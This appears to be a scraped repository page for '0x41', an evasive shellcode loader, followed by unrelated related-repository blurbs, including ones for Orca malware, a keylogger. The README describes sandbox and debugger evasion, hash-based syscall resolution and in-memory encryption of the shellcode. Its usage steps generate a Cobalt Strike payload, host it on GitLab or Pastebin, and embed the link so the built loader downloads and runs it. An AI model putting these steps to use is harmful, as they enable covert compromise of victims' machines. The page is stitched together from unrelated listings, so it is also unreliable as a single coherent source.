THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

Overview

How Does 0x41 work:

1- checks the environment [detect sandboxes / debuggers / virtual machines]

2- download the [encrypted] shellcode file [.bin] if the check succeeded

3- get the syscalls needed, dynamically through hashes, and not predifined code.

4- reads / loads the binary into memory [still not executed] Note that the decryption && injections happens together.

5- sleep for 10 sec [u can modify this to fit ur need]

6- luanch the shellcode;

a. the shellcode will be luanched for couple of milleseconds only so that we can have a confirmation that we accessed the target.

b. after the heart beat is sent, we then generate a randome byte [which will be used to encrypt the shellcode], move the shellcode to "page no access", and encrypt it with the random byte generated earlier.

c. when the sleep on our server is done, we then move the shellcode to "rwx", decode it with our key, and execute the commands [if sent]

d. then it will do the steps again, but with a different encryption keys every time.

USAGE:

  1. first load the profile using the following command: ./teamserver.sh .

  2. run cobalt strike : ./cobaltstrike.sh .

  3. generate ur payload [preferably https] 'but its a must to create it as x64 [raw file format]' Attacks -> Packages -> Payload Generator . save it as payload.bin

  4. move the payload.bin file created earlier, to the same direcotory as binencoder.py

  5. run binencoder.py using python2

  6. upload result.bin file to (github / gitlab / pastebin ..etc..), copy the 'raw' link or the 'download' link of result.bin file.

  7. paste it in line 116 in utils.h; Ex; should look like [if from gitlab.com]: "https://gitlab.com/username/reponame/-/raw/main/result.bin?inline=false"

  8. build it as release x64

  9. enjoy !

You might also like...
Upload codes in any language in this repository
Upload codes in any language in this repository

HacktoberFest21 Hello Hackers! HacktoberFest has begun again for year 2021, and everyone's excited to get started! What is Hacktoberfest? Hacktoberfes

Unofficial upload of ChinesePython, a translation of the Python programming language in Chinese [Provided by UrduPython engineers]

# Downloaded from SourceForge: https://sourceforge.net/projects/chinesepython/ # (Uploaded as is) ---------------------------------------------------

libelf as part of elfutils has been a major pain in the ass.

libelf in zig libelf as part of elfutils has been a major pain in the ass. All I want to do is make statically compiled programs that use eBPF (libbpf

A recreation of the
A recreation of the "Nobelium" malware based on Microsofts Malware analysis - Part 1: PDF2Pwn

Nobelium PdfDownloadRunAesMalware A recreation of the "Nobelium" malware based on Microsofts Malware analysis - Part 1: PDF2Pwn 1. Download PDF file f

Vaccine Monitor app implemented in C with system Programming techniques.Projects implemented as part of the course Syspro K24

System_Programming_Projects Vaccine Monitor app implemented in C with system Programming techniques.Projects implemented as part of the course Syspro

mimic of libc’s printf function (42 Project, mandatory part only)

42printf mimic of libc’s printf function (42 Project, mandatory part only) This hasn't been tested yet by moulinette and is not recommended to take as

Final version of my dissertation project at the University of Birmingham as part of MSc. Computer Science degree.
Final version of my dissertation project at the University of Birmingham as part of MSc. Computer Science degree.

Unfair Edge: A Low-Level Manipulation of Game Memory with Bypassing VAC This repository hosts the code submitted as a dissertation project for MSc. Co

Language that provides an abstraction to a PART of GTK difficulty
Language that provides an abstraction to a PART of GTK difficulty

Welcome to GPP_COMPILER Language that provides an abstraction to a PART of GTK difficulty . To get projet on your computer, clone it using the followi

Source code for the data dependency part of Jan Kossmann's PhD thesis "Unsupervised Database Optimization: Efficient Index Selection & Data Dependency-driven Query Optimization"

Unsupervised Database Optimization: Data Dependency-Driven Query Optimization Source code for the experiments presented in Chapter 8 of Jan Kossmann's

Owner
YOUR CODE IS ONLY LIMITED BY YOUR IMAGINATION
null
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

ACHLYSv1 How it works: First ACHLYS detects the environment of the machine its being in, by checking sandboxes and debuggers presents. second when the

null 16 Nov 29, 2021
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

How Does 0x41 work: 1- checks the environment [detect sandboxes / debuggers / virtual machines] 2- download the [encrypted] shellcode file [.bin] if t

null 38 Jan 12, 2022
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

WHALE : A AES CRYPTOR USAGE: All u have to do is to build "builder" project and run it according to ur arguments. the builder.exe will then build and

null 40 Sep 9, 2022
This is the repo for the microcontroller part of project Cleanurge - a scalable IoT powered waste management system, our solution towards a greener world.

Cleanurge A scalable waste management system powered by IoT. There are 3 repositories for the entire cleanurge system in total cleanurge-mcu: Containi

Developer Student Clubs KGEC 6 Oct 11, 2021
Orca - Advanced Malware with multifeatures written in ASM/C/C++ , work on all windows versions ! (some features still under developing and not stable)

About Orca Orca is an Advanced Malware with multifeatures written in ASM/C/C++ features Run in Background (Hidden Mode) Records keystrokes and saves t

anas 183 Nov 17, 2022
Upload arbitrary data via Apple's Find My network.

Send My Send My allows you to to upload abritrary data from devices without an internet connection by (ab)using Apple's Find My network. The data is b

Positive Security 1.5k Nov 23, 2022
This was the first ever Computer Science project that I made back in Class XII (2016). I thought I should upload it on GitHub so that it does not get lost. :)

First Ever Project This was the first ever Computer Science project that I made back in Class XII (2016). I thought I should upload it on github so th

Kshitiz Srivastava 3 Jun 7, 2021
An ESP32 system that can perform a Directory, Upload, Download, Delete, Rename and Stream Files in SPIFFS

ESP-File-Server An ESP32 system that can perform a Directory, Upload, Download, Delete, Rename and Stream Files in SPIFFS Using an ESP32 to handle fil

G6EJD 29 Nov 15, 2022
NightDriverStrip is a source code package for building a flash program that you upload to the ESP32 microcontroller.

NightDriverStrip is a source code package for building a flash program that you upload to the ESP32 microcontroller.

Plummer's Software LLC 608 Nov 30, 2022
Resize, crop, and convert images on Upload.

Upload Image Plugin Resize, crop, and convert images on Upload. To use this plugin use the following settings in a "Transformation Step" in the Upload

Upload.js 20 Mar 31, 2022